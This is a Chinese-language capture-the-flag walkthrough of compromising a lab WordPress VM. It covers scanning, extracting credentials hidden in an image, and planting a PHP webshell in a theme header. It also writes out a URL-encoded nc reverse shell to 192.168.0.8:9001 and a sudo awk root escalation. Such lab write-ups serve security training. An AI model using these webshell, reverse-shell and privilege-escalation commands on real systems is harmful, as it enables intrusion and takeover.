发现靶机ip,使用nmap进行扫描
使用firefox 192.168.0.9进行访问。
可以查看页面的源代码,看看有没有什么有用信息。
使用目录扫描器gobuster扫描,发现一个wordpress目录。命令:gobuster dir -u http://192.168.0.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
访问成功,发现有一些标签并没有进行加载。需要让css样式进行加载
做一个hosts,把IP加入到localhost
访问成功,加载了样式。
发现这里有个用户,可以试着后台登录。
找到后台,尝试弱密码登录,无法登录。
看一下忘记密码,能不能获得验证的邮箱或者地址。
也无法获得邮箱和地址。
到这一步,再回到刚才的目录扫描,看看其他的目录文件。发现有一个img试着访问。
发现有一个图片是flag开头的,打开查看。
先把图片保存下来。
在本地使用工具查看里面的内容,发现一个好像passwd的密码,保存在文件夹中。
在使用其他工具查看一下信息。exiftool没有安装,使用apt-get install exiftool进行安装。
发现make当中同样存在passwd。
思考这个pass会是一个什么,重新使用账号进行登录,发现还是提示密码不对。
试试看会不会是目录文件,发现访问成功。有一个hostIP文件和一个flag文件。
发现是一个加密文件,把加密文件用百度进行查找
进行解密,获得账号密码,web:Hacker@4514 然后保存到文件夹中
使用账号密码进行登录,成功登录到了后台。
查看用户,发现我们是超级管理员,那就可以编写一个主题,拿webshell。
来到主题编写header这个主题,加入一句话木马。
更新一下,system($_REQUEST['knife']);
更新之后,来到主页,输入http://localhost/wordpress/?knife=id,成功使用
打开burp,放到reqeater,使用post传参,来使用反弹shell
监听本地的9001端口。nc -lvnp 9001
ctrl+u进行编码。使用反弹shell命令:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.8+9001+>/tmp/f
反弹成功,做一个bashshell。
命令:python -c 'import pty;pty.spawn("/bin/bash")'
在文件当中,发现了一个config文件,进行查看,可以看见数据库账号和密码。
命令:cat /etc/passwd 查看密码文件
切换用户为web,之前获得的账号密码进行登录。
查看当前用户的权限,awk是可以调用系统函数的。可以进行执行root的命令
命令:sudo awk '{ system("/bin/bash")}' ,获得root权限。
进入root目录,查看文件,获得flag。
查看cat /etc/sudoers文件,发现web是nopasswd,可以使用awk。
这个版本也存在一个提权漏洞,也是另一种方法。uname -a
总结:
1.当发现后台进行爆破无法成功时,需要想一想目录的问题,会不会提示信息是在目录当中。
2.发现一些编码格式时,可以百度进行查看解密。
3.基本上拿到webshell之后所思考的提权都是有很多种的,根据情况不同,需要有不同的方法。
